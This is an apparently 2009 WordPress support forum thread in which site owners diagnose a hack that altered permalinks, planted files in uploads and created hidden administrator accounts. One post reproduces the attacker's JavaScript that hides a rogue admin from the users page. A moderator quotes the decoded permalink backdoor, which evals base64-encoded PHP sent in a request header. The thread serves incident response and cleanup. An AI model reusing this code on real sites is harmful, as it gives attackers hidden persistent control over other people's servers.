WordPress › Support » WP adding code to the end of url links breaking them

pajiste
Member
Posted 2 years ago #

I got the same problem and was forwarded this link by a friend...pretty straight-forward.
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
dyske
Member
Posted 2 years ago #

I have 2 equally popular blogs but only one was affected. The only difference was that the unaffected one did not have RPC enabled. In fact I had the PHP file for RPC deleted. How was the RPC setup for everyone here?
martinedens
Member
Posted 2 years ago #

@johninnit I got him at 2.7.1. Damn that's some nasty code. Thanks for the heads up.
erwanpia
Member
Posted 2 years ago #

I got the bug with extra code in a dozen php pages, but no extra administrator

anyway an upgrade was needed :), was on 2.7 or somthg
patrickbryant
Member
Posted 2 years ago #

By viewing one user and then changing the number in the address line, I found new user:
LucasAguilar63

with first name:
... <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

Changed to Subscriber and then deleted.
dyske
Member
Posted 2 years ago #

Another difference between affected and unaffected sites: The unaffected site had no user named "admin". I had deleted it.

It could simply mean that the unaffected site was not attacked.
wysiwyg2009
Member
Posted 2 years ago #

Anyone else not have this hidden admin user? My site has 4 legitimate admin users, I've checked the database and there are no extra users, there are no users that "hide" when I view them in WordPress, does that mean my site is clean?

Im worried that by fixing the permalink problem, I've fixed the symptom and not the cause, because I dont have any admin users to delete...
dyske
Member
Posted 2 years ago #

Another thing I noticed:

in wp-content/uploads, I found two suspicious files:

topper.php
wp-pass.php

I found them when I searched for "base64"
Otto
Tech Ninja
Posted 2 years ago #

For anybody interested, having that particular code in your permalink is a backdoor.

That decodes internally to this:
/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

Which, rather cleverly, causes any single post URL to look for a header called "HTTP_EXECCODE" sent by the client, run it through base64_decode, and then to execute the PHP code contained therein.

In other words, with that on your site, anybody with a little bit of know-how can force your site to run arbitrary PHP code. Which is probably how they got in, after they somehow got your permalink URL to change to that (probably via SQL injection in old WP versions).
Roy
Member
Posted 2 years ago #

I was afraid of something like that... There are six threads going about this, it would be nice if this could be combined. One thread has found an axtra superuser and files added to the content folder, another has an edited theme index.php. All people I checked have 2.7 versions, does this go for everyone? None of the 2.8.4 blogs that I run myself are infected. Judging this particular thread, this (automatic) hack has started about a month ago, but apparently it is not becoming very active (or noticed after holidays).
dyske
Member
Posted 2 years ago #

@Otto42

As others have noticed, a function was inserted into various files (index.php and wp-config.php) which executes the code passed via the URL. This would mean that the insertion of function had to happen first because the permalink change would be useless without the inserted PHP function.

So, I suspect that uploading the PHP files to wp-content/uploads happened before that (but not necessarily as the first step).
robk30
Member
Posted 2 years ago #

I found the hidden admin with all the suspect code as his name. I deleted the code but how do I delete the user?
turil
Member
Posted 2 years ago #

Robk30, set the user to be a "subscriber" rather than an "administrator", then go back out to the main users' list and delete the user.
dyske
Member
Posted 2 years ago #

As Otto42 said in the sticky post, once the security fix is released, the hackers know exactly where the security hole was. So, they can write a script to exploit the hole and target sites with earlier versions.

The problem with this situation is that it means the most vulnerable versions are the ones slightly behind the latest. It means every time a new version is released, you have to upgrade it immediately, which is a lot of work for those who are not professional Webmasters. It means every new version is a security threat to the earlier versions.

But it also means that the version that are really old (say below 2.0) would be unlikely to be hacked. It does not mean that it's safe; it just means that it is unlikely that anyone would bother hacking such an old version.
farlane
Member
Posted 2 years ago #

This link WAS very helpful!
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

The hidden Admin user who is created has a weird [div] as the first name that hides their name from display.
zeppelined
Member
Posted 2 years ago #

I went and changed the permission on the index.php and wp-cache-config.php
files that I found in wp-content. I actually removed all permissions from them. Is it safe to delete those files altogether?
robk30
Member
Posted 2 years ago #

Has anyone else seen wp-pass.php or xmlrpc.php uploaded to their FTP? I see both...should I delete or modify them? Not sure if they're part of this hack. I was able to delete the new admin and change the permalinks, but want to fix anything else that may be broken.
dyske
Member
Posted 2 years ago #

@robk30

xmlrpc.php (in root folder) is part of the normal install of WP, but I deleted it because I do not need it personally, and it's a potential entry point for hackers.

wp-pass.php in /wp-content/uploads shouldn't be there (as far as I know). Nor any PHP files in the "uploads" folder.
pielface
Member
Posted 2 years ago #

Wow what a friday....

Guys, I was running 2.8.3 and only saw that the script managed to change my permalinks. no admin user created or other things. I did see a wp-inclode.php and a fotter.php in the uploads dir. I removed those.

My blog is acting weird. It is really slow (the admin interface) and it cannot contact akismet. anyone experiencing this since the bot attack?

plus im seeing a lot more spam....
dyske
Member
Posted 2 years ago #

@pielface

I think you are the first person reporting the hack using 2.8.x

Everyone else so far was on 2.7.x

I wonder if the latest is actually safe if 2.8.3 is not.

If someone could upload PHP files to your server and modify the database, I would imagine that everything else is possible.

The admin user is hidden from you by a clever user of Javascript. Are you sure you don't have a hidden admin?
zeppelined
Member
Posted 2 years ago #

Hm, the index.php that was in the content folder had only this in it:

<?php
// Silence is golden.
?>

The other file had a bunch of code.
pielface
Member
Posted 2 years ago #

@dyske

@zeppelined

I too have a index.php in /wp-content/ with the "silence is golden".

I only show 1 admin (my account). under the "users" option.

but still, the interface is slow...and no contact with akismet. I just updated to 2.8.4. no luck.
pielface
Member
Posted 2 years ago #

OK scratch the latency issues.

That was a different DNS issue.

Looks like 2.8.x only had the permalink altered. No admin users created
robk30
Member
Posted 2 years ago #

Do you guys think I should delete wp-pass.php?
dyske
Member
Posted 2 years ago #

@robk30

I deleted wp-pass.php that was in my "uploads" folder.
kirkpete
Member
Posted 2 years ago #

I have that "Silence is Golden" uploads.php file in a few places, but not in the Uploads directory.

Should that file be deleted?
Grinder666
Member
Posted 2 years ago #

I am running WordPress 2.8.2
I've got the the updated permalink structure and the hidden administrator.
No file uploads oder modified files.

Interesting facts:
1st:
I've got a mail from one of my readers who told me that my links don't work. This was at 11 o clock in the morning.
According to the database the creation of the hidden administrator account was at 16 o clock. So the user was createed AFTER the permalink has allreday been changed.

2nd: I don't allow registrations. But I had three registrations in the previous 4 days. These user acccounts seem to be "normal"; no special code in any fields.

I'll chek the server logfiles. This could take some time.

Should have reacted sooner.
Grinder666
Member
Posted 2 years ago #

I have to correct myself.

I am not sure if the register option was enabled or not.

I found the script that is supposed to be executed by the modified permalink. This script seemmsto deactive the register option.

Still no idea who the permmalink was modified.
I'm on it.

Seems as this is a perfect exammple of cross site scripting.
cpjolicoeur
Member
Posted 2 years ago #

I can confirm this hacked worked (at least partially) on my site running 2.8.4

There were 2 new admin accounts created but no files or permalinks were changed.

The 2 new admin accounts were created with the javascript code embeded in their associated wp_usermeta values like we have seen so far.

All my other 2.8.4 sites seem to be fine, but this one site was "hacked" so to speak.

No real damage one other than the user accounts being created and the wp_usermeta values being added to hide the users from showing on the wp-admin users page.

Just wanted to confirm that this IS affecting 2.8.4 though.
Otto
Tech Ninja
Posted 2 years ago #

I've analysed one of these hacked sites now, and worked out how it was done, basically. 2.8.3 fixed this particular vulnerability, and the permalink change is indeed the first step in the attack. Files are then added to the system via that route, creating more exploitable backdoors. This is a pretty standard hack methodology really: exploit to load standard hacking code from elsewhere.

Note the that flaw requires you to allow registration on your blog. Blogs that don't allow registration would not be vulnerable.

The latest two versions of WordPress are NOT vulnerable to this particular attack vector. This is confirmed.

If you don't see the permalink change, then your blog was attacked via a different means (possibly exploiting backdoors left behind from previous intrusions before you upgraded). However, the payload and result would likely be identical, even if the method differed. Standard hacker tools tend to use the same payloads regardless of the entry method. Just shows you got hacked by the same guy as everybody else.